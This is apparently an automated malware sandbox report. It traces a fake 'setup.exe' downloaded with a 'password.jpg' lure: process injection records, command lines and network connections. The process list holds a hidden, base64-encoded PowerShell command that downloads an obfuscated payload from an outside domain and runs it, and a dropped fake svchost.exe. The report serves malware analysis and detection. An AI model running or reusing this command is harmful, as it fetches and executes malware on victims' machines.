N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\your_files\setup\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 204 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 4180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 3000 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 3000 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 204 wrote to memory of 1920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.up-4ever.net/f81xcrmamr72

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff86f979758,0x7ff86f979768,0x7ff86f979778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2864 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2036 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

c:\windows\system32\sihost.exe

sihost.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4640 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4844 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5356 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5836 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3796 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4952 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=768 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2904 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DsSvc

C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe

"C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" -ServerName:Microsoft.MSPaint.AppX437q68k2qc2asvaagas2prv9tjej6ja9.mca

C:\Users\Admin\Downloads\your_files\setup\setup.exe

"C:\Users\Admin\Downloads\your_files\setup\setup.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding DC89B66988FA4B04CEC0520C89FCD9D3 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\Downloads\your_files\setup\setup.exe SETUPEXEDIR=C:\Users\Admin\Downloads\your_files\setup\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707400341 " AI_EUIMSI=""

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E70F789581D10F3FA049E68B56022B52

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrCB71.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe

"C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAGcAbwBvAGQAMgAtAGwAZQBkAC4AYwBvAG0ALwBkAGEAcgBrADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBkACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAZwAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgBzACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1968

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.up-4ever.net udp
US 172.67.216.188:443 www.up-4ever.net tcp
US 172.67.216.188:443 www.up-4ever.net tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 172.67.216.188:443 www.up-4ever.net udp
GB 172.217.16.238:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.180.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 ae01.alicdn.com udp
US 8.8.8.8:53 dt.betoyanracks.com udp
NL 23.109.170.34:443 dt.betoyanracks.com tcp
GB 172.217.16.238:443 fundingchoicesmessages.google.com udp
GB 142.250.180.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 188.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 184.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 226.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 2.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 232.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 34.170.109.23.in-addr.arpa udp
GB 79.133.176.252:443 ae01.alicdn.com tcp
US 8.8.8.8:53 gigjjgb.com udp
US 104.21.69.201:443 gigjjgb.com tcp
US 8.8.8.8:53 lh3.googleusercontent.com udp
GB 216.58.201.97:443 lh3.googleusercontent.com tcp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
GB 172.217.16.238:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 www.google.co.uk udp
US 216.239.32.36:443 region1.analytics.google.com tcp
BE 64.233.184.157:443 stats.g.doubleclick.net tcp
GB 216.58.204.67:443 www.google.co.uk tcp
US 104.21.69.201:443 gigjjgb.com udp
US 8.8.8.8:53 tvkaimh.com udp
US 8.8.8.8:53 youradexchange.com udp
US 104.21.91.188:443 youradexchange.com tcp
US 8.8.8.8:53 pubtrky.com udp
US 8.8.8.8:53 ctrtrk.com udp
US 172.67.204.62:443 ctrtrk.com tcp
US 104.21.8.108:443 pubtrky.com tcp
US 8.8.8.8:53 252.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 201.69.21.104.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 157.184.233.64.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 188.91.21.104.in-addr.arpa udp
US 8.8.8.8:53 62.204.67.172.in-addr.arpa udp
US 8.8.8.8:53 108.8.21.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 appslabs.monster udp
US 104.21.91.188:443 youradexchange.com udp
US 104.21.8.108:443 pubtrky.com udp
US 104.21.94.236:443 appslabs.monster tcp
US 104.21.94.236:443 appslabs.monster tcp
US 8.8.8.8:53 236.94.21.104.in-addr.arpa udp
US 104.21.94.236:443 appslabs.monster udp
US 8.8.8.8:53 confidence-x.com udp
US 172.67.210.218:443 confidence-x.com tcp
US 8.8.8.8:53 218.210.67.172.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
GB 172.217.169.78:443 drive.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.213.14:443 apis.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 blobcomments-pa.clients6.google.com udp
US 8.8.8.8:53 content.googleapis.com udp
NL 142.250.27.84:443 accounts.google.com udp
GB 172.217.169.10:443 blobcomments-pa.clients6.google.com tcp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
